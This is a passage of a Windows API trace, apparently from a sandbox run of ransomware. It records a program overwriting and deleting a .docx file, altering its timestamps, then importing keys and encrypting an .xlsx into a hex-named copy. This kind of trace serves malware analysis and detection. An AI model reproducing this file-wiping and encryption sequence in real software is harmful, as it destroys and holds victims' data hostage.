nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.811] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.812] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.813] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.813] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.814] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.815] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.815] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.816] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.817] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.818] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.819] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.819] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.819] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0074.819] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.820] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.821] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.822] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.822] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.823] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.824] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.826] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.826] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.827] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.827] SetEndOfFile (hFile=0x36c) returned 1 [0074.828] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.829] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lm400zl.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.829] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.829] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lm400zl.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.830] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0074.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lm400zl.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.830] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0074.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.830] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lm400zl.docx")) returned 1 [0074.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", lpFilePart=0x0) returned 0x48 [0074.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3b1915656b6e08fc711349bfcd0aaf93"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.831] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", lpFilePart=0x0) returned 0x48 [0074.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3b1915656b6e08fc711349bfcd0aaf93"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.831] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0074.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", lpFilePart=0x0) returned 0x48 [0074.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3b1915656b6e08fc711349bfcd0aaf93"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.832] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0074.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.833] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x22dbe98, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0074.833] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.833] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.833] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22dbf88, pdwDataLen=0x1bf5db30 | out: pbData=0x22dbf88*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.833] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x22dc0a8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626fa0) returned 1 [0074.833] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.833] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.833] CryptDuplicateKey (in: hKey=0x1a626fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626f30) returned 1 [0074.833] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.833] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x4, pbData=0x22dc1f0*=0x1, dwFlags=0x0) returned 1 [0074.833] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x1, pbData=0x22dc1a0, dwFlags=0x0) returned 1 [0074.833] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0074.833] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0074.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx", lpFilePart=0x0) returned 0x36 [0074.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M8JcrX7yq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m8jcrx7yq.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.834] GetFileType (hFile=0x36c) returned 0x1 [0074.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.834] GetFileType (hFile=0x36c) returned 0x1 [0074.834] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", lpFilePart=0x0) returned 0x48 [0074.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94ea079d23393052d969a1bc5c46a252"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0074.834] GetFileType (hFile=0x380) returned 0x1 [0074.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.834] GetFileType (hFile=0x380) returned 0x1 [0074.834] ReadFile (in: hFile=0x36c, lpBuffer=0x22dc5a0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22dc5a0*, lpNumberOfBytesRead=0x1bf5da28*=0x11257, lpOverlapped=0x0) returned 1 [0074.836] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22f05b8*, pdwDataLen=0x1bf5da80*=0x11250, dwBufLen=0x11250 | out: pbData=0x22f05b8*, pdwDataLen=0x1bf5da80*=0x11250) returned 1 [0074.836] WriteFile (in: hFile=0x380, lpBuffer=0x22f05b8*, nNumberOfBytesToWrite=0x11250, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x22f05b8*, lpNumberOfBytesWritten=0x1bf5da18*=0x11250, lpOverlapped=0x0) returned 1 [0074.838] ReadFile (in: hFile=0x36c, lpBuffer=0x22dc5a0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22dc5a0*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0074.838] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2301848*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x2301848*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.838] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2301898*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2301898*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.838] WriteFile (in: hFile=0x380, lpBuffer=0x23018e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x23018e8*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0074.838] CloseHandle (hObject=0x380) returned 1 [0074.839] CloseHandle (hObject=0x36c) returned 1 [0074.839] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0074.839] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0074.839] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0074.839] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252", lpFilePart=0x0) returned 0x48 [0074.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0074.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94ea079d23393052d969a1bc5c46a252"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.840] GetFileType (hFile=0x36c) returned 0x1 [0074.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0074.840] GetFileType (hFile=0x36c) returned 0x1 [0074.840] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.841] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.842] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.843] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.844] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.844] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.844] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.844] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.845] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.845] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.845] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.845] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.845] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.845] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.845] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.845] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.846] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.846] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x260, lpOverlapped=0x0) returned 1 [0074.846] ReadFile (in: hFile=0x36c, lpBuffer=0x2302fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2302fe0*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0074.846] CloseHandle (hObject=0x36c) returned 1 [0074.847] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94EA079D23393052D969A1BC5C46A252.info", 